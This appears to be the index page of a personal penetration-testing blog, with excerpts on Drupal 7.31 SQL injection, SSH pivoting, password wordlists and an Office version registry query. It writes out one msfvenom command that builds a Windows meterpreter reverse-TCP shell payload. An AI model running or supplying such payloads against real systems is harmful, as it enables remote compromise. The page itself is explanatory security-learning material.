There’s a certain feeling of satisfaction when you can manually work your way through exploiting a box.  Not only that, you’ll have a better understanding of what’s really going on under the hood.  You don’t really get that when you’re using automated tools.  Not that I don’t use what’s in the toolbox but given the choice, I will try the manual route first.

I've not seen much of Drupal from either side but I found myself staring at a 7.31 installation and after some quick searches, I realized it was vulnerable to SQL injection.

Read more: Drupal to Low Priv Shell

I wanted to generate some shell code for an exploit and I used the following command:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f js_le -b "\x00\x0a\x0d"

Read more: msfvenom -- Specific Byte Count

I have a wordlist I created from a collection of wordlists I've acquired.  It's not the end-all, be-all wordlist but it's a big and if you have a weak password, it's in this list.  In fact, if you have a decent password, it's in the list.

It's a good list for banging against passwords to see if they are reasonably secure.  When I attempt to crack a passwords, I go to the top 10 most used, the top 500 most used, and then 'the' list.  Beyond that, I'm probably going to stop unless I have a different motivation.

Read more: Cewl -- Building Wordlists

Network segmentation is common in the enterprise but becoming more common in smaller environments.  If I compromise a box in my local segment and that box has access to another segment, we can use port forwarding to leap frog across.

The typical example has us making an actual connection which ties up one of our terminal sessions with an open ssh connection.  Fine, we can spawn a bunch of terminal sessions but we can also background it.

Read more: SSH Port Forwarding

I needed to quickly gather the version of Microsoft Office in a mixed version environment.  Simple enough, let's grab the version of Word:

reg query "HKEY_CLASSES_ROOT\Word.Application\CurVer"

Read more: Command Line -- Microsoft Office Version

"A problem occurred during the delivery of this message to this e-mail address. Try sending this message again. If the problem continues, please contact your helpdesk."

Read more: #5.1.0 Address rejected.